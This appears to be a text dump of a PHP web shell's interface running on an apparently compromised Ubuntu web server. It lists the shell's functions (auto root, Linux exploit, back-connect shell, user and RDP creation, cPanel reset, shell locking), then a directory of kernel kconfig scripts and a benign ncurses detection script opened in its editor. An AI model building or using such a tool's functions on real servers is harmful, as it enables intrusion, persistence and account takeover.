Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.190.104
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.4.0-198 /
scripts /
kconfig /
[ HOME SHELL ]
Name
Size
Permission
Action
lxdialog
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
.gitignore
97
B
-rw-r--r--
Makefile
7.08
KB
-rw-r--r--
conf.c
14.86
KB
-rw-r--r--
confdata.c
27.89
KB
-rw-r--r--
expr.c
30.07
KB
-rw-r--r--
expr.h
9.68
KB
-rw-r--r--
gconf-cfg.sh
733
B
-rwxr-xr-x
gconf.c
38.06
KB
-rw-r--r--
gconf.glade
25.04
KB
-rw-r--r--
images.c
6.32
KB
-rw-r--r--
images.h
752
B
-rw-r--r--
lexer.l
9.17
KB
-rw-r--r--
list.h
3.66
KB
-rw-r--r--
lkc.h
3.81
KB
-rw-r--r--
lkc_proto.h
2.42
KB
-rw-r--r--
mconf-cfg.sh
1.11
KB
-rwxr-xr-x
mconf.c
27.33
KB
-rw-r--r--
menu.c
21.38
KB
-rw-r--r--
merge_config.sh
4.64
KB
-rwxr-xr-x
nconf-cfg.sh
1.18
KB
-rwxr-xr-x
nconf.c
38.16
KB
-rw-r--r--
nconf.gui.c
14.77
KB
-rw-r--r--
nconf.h
1.82
KB
-rw-r--r--
parser.y
15.11
KB
-rw-r--r--
preprocess.c
11.07
KB
-rw-r--r--
qconf-cfg.sh
846
B
-rwxr-xr-x
qconf.cc
44.09
KB
-rw-r--r--
qconf.h
7.38
KB
-rw-r--r--
streamline_config.pl
16.16
KB
-rwxr-xr-x
symbol.c
29.04
KB
-rw-r--r--
util.c
2.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mconf-cfg.sh
#!/bin/sh # SPDX-License-Identifier: GPL-2.0 PKG="ncursesw" PKG2="ncurses" if [ -n "$(command -v pkg-config)" ]; then if pkg-config --exists $PKG; then echo cflags=\"$(pkg-config --cflags $PKG)\" echo libs=\"$(pkg-config --libs $PKG)\" exit 0 fi if pkg-config --exists $PKG2; then echo cflags=\"$(pkg-config --cflags $PKG2)\" echo libs=\"$(pkg-config --libs $PKG2)\" exit 0 fi fi # Check the default paths in case pkg-config is not installed. # (Even if it is installed, some distributions such as openSUSE cannot # find ncurses by pkg-config.) if [ -f /usr/include/ncursesw/ncurses.h ]; then echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncursesw\" echo libs=\"-lncursesw\" exit 0 fi if [ -f /usr/include/ncurses/ncurses.h ]; then echo cflags=\"-D_GNU_SOURCE -I/usr/include/ncurses\" echo libs=\"-lncurses\" exit 0 fi if [ -f /usr/include/ncurses.h ]; then echo cflags=\"-D_GNU_SOURCE\" echo libs=\"-lncurses\" exit 0 fi echo >&2 "*" echo >&2 "* Unable to find the ncurses package." echo >&2 "* Install ncurses (ncurses-devel or libncurses-dev" echo >&2 "* depending on your distribution)." echo >&2 "*" exit 1
Close